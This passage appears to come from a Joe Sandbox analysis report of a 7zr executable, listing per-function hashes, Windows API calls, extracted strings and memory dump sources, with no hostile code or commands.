                            • Opcode ID: c7437f907441a7681b6618a094e5e1a53ee01d609c92c43938e9953d9e9a41c4
                            • Instruction ID: 868d4c58d7ff8d6f948a731380d73f47f25a5bbbb36eb8c7cd658bf20f0760b3
                            • Opcode Fuzzy Hash: c7437f907441a7681b6618a094e5e1a53ee01d609c92c43938e9953d9e9a41c4
                            • Instruction Fuzzy Hash: 9251B371C102859EDF39DBAC88A1AFD7BB1BF26310F28845ED096561D2D6399DC8E701
                            APIs
                            • __EH_prolog.LIBCMT ref: 006DA4F8
                              • Part of subcall function 006DA384: __EH_prolog.LIBCMT ref: 006DA389
                              • Part of subcall function 006D9E14: GetSystemInfo.KERNEL32(?), ref: 006D9E36
                              • Part of subcall function 006D9E14: GetModuleHandleA.KERNEL32(kernel32.dll,GetNativeSystemInfo), ref: 006D9E50
                              • Part of subcall function 006D9E14: GetProcAddress.KERNEL32(00000000), ref: 006D9E57
                            • strcmp.MSVCRT ref: 006DA564
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1847196084.00000000006D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 0000000A.00000002.1847141728.00000000006D0000.00000002.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1847481070.000000000077C000.00000002.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1847665775.0000000000792000.00000004.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1847759485.000000000079B000.00000002.00000001.01000000.0000000A.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_6d0000_7zr.jbxd
                            Similarity
                            • API ID: H_prolog$AddressHandleInfoModuleProcSystemstrcmp
                            • String ID: -
                            • API String ID: 2798778560-3695764949
                            • Opcode ID: 7f77c5ebe3485caf1324ae12c3c2868bb600f478312b2b99454807b4132a8552
                            • Instruction ID: 86db650b806b71881a0997f1cc8e013782a9c8257839006c1f46c3605e9d9522
                            • Opcode Fuzzy Hash: 7f77c5ebe3485caf1324ae12c3c2868bb600f478312b2b99454807b4132a8552
                            • Instruction Fuzzy Hash: 8A313932D0120AEBCF55EBE0E8629EDB777AF64310F10406FE40172391DB759A49DA65
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1847196084.00000000006D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 0000000A.00000002.1847141728.00000000006D0000.00000002.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1847481070.000000000077C000.00000002.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1847665775.0000000000792000.00000004.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1847759485.000000000079B000.00000002.00000001.01000000.0000000A.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_6d0000_7zr.jbxd
                            Similarity
                            • API ID: H_prolog
                            • String ID: 0$x
                            • API String ID: 3519838083-1948001322
                            • Opcode ID: c917e8c916400b46ba3faae33e8adb4532833d36abe0c3abc834cf921dc17f5b
                            • Instruction ID: b0a799ac756e402a8358f6f846264ed38505be2155f4a1906d50e73a0d28165c
                            • Opcode Fuzzy Hash: c917e8c916400b46ba3faae33e8adb4532833d36abe0c3abc834cf921dc17f5b
                            • Instruction Fuzzy Hash: 3A216F32D0111EDBCF04EB94D9A5AEDB7B6FF98304F10012AE90177282DB795E04CBA4
                            APIs
                            • __EH_prolog.LIBCMT ref: 00734039
                              • Part of subcall function 007340BA: __EH_prolog.LIBCMT ref: 007340BF
                              • Part of subcall function 00715E2B: __EH_prolog.LIBCMT ref: 00715E30
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1847196084.00000000006D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 0000000A.00000002.1847141728.00000000006D0000.00000002.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1847481070.000000000077C000.00000002.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1847665775.0000000000792000.00000004.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1847759485.000000000079B000.00000002.00000001.01000000.0000000A.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_6d0000_7zr.jbxd
                            Similarity
                            • API ID: H_prolog
                            • String ID: D.x$T.x
                            • API String ID: 3519838083-3356495739
                            • Opcode ID: 0a1efd9b6eeaf552ac33fb031909d1f49505a6b71e821ef432bcbbc380249329
                            • Instruction ID: dbaa551261a3c2ae6112c55f1e61ad048cd1a12e07c683a9a113f443c29637fe
                            • Opcode Fuzzy Hash: 0a1efd9b6eeaf552ac33fb031909d1f49505a6b71e821ef432bcbbc380249329
                            • Instruction Fuzzy Hash: 650144B0911B04CFC728DF68C50969ABBF4FF08704F00896ED09A93742D7B8A648CB91
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1847196084.00000000006D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 0000000A.00000002.1847141728.00000000006D0000.00000002.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1847481070.000000000077C000.00000002.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1847665775.0000000000792000.00000004.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1847759485.000000000079B000.00000002.00000001.01000000.0000000A.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_6d0000_7zr.jbxd
                            Similarity
                            • API ID: fputs
                            • String ID: =
                            • API String ID: 1795875747-2525689732
                            • Opcode ID: bd5f0c6bd6048a6b2634b42c2cff4d8197f399670170023fb1d16c5ba0ab80a0
                            • Instruction ID: 93b651fa13be31928e956b914de81374752a4111fc4e3daa0b38b789f42ccfff
                            • Opcode Fuzzy Hash: bd5f0c6bd6048a6b2634b42c2cff4d8197f399670170023fb1d16c5ba0ab80a0
                            • Instruction Fuzzy Hash: C9E0DF71E00118ABCF00FBE89C51CBE7B69FBC43947500836E524CB281FA749921CBD9
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1847196084.00000000006D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 0000000A.00000002.1847141728.00000000006D0000.00000002.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1847481070.000000000077C000.00000002.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1847665775.0000000000792000.00000004.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1847759485.000000000079B000.00000002.00000001.01000000.0000000A.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_6d0000_7zr.jbxd
                            Similarity
                            • API ID: fputs
                            • String ID: Unsupported Windows version$p&y
                            • API String ID: 1795875747-3165590651
                            • Opcode ID: 3c87570e76a9f2252ff92b68ed78010dbf773eb8935b9fef50d628a54da1d1be
                            • Instruction ID: ec4beb434c37d5371fbec93ba39de5d9cc700bf119678780e44758f5d0b15abb
                            • Opcode Fuzzy Hash: 3c87570e76a9f2252ff92b68ed78010dbf773eb8935b9fef50d628a54da1d1be
                            • Instruction Fuzzy Hash: 26D0C9B7748240EFD70A9BC8F946BA477B0E788761F60896BE102D61D1D7BD64068B14
                            APIs
                            • memcmp.MSVCRT(?,007848A0,00000010), ref: 007341D6
                            • memcmp.MSVCRT(?,00780168,00000010), ref: 007341F1
                            • memcmp.MSVCRT(?,007801E8,00000010), ref: 00734205
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1847196084.00000000006D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 0000000A.00000002.1847141728.00000000006D0000.00000002.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1847481070.000000000077C000.00000002.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1847665775.0000000000792000.00000004.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1847759485.000000000079B000.00000002.00000001.01000000.0000000A.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_6d0000_7zr.jbxd
                            Similarity
                            • API ID: memcmp
                            • String ID:
                            • API String ID: 1475443563-0
                            • Opcode ID: 0bfd590ee79bf99ea311f20ee75cfeadfe05f820a9f07411f5925b2d037c8bd3
                            • Instruction ID: 151dcf0d853cd69ccebe24b79c4fc0dfd84e3fded8cfe2689684e53f9a181229
                            • Opcode Fuzzy Hash: 0bfd590ee79bf99ea311f20ee75cfeadfe05f820a9f07411f5925b2d037c8bd3
                            • Instruction Fuzzy Hash: 3401C471780209ABE7145B14DC42F7E73A4AF64760F044429FE46EB282F6BDB9509794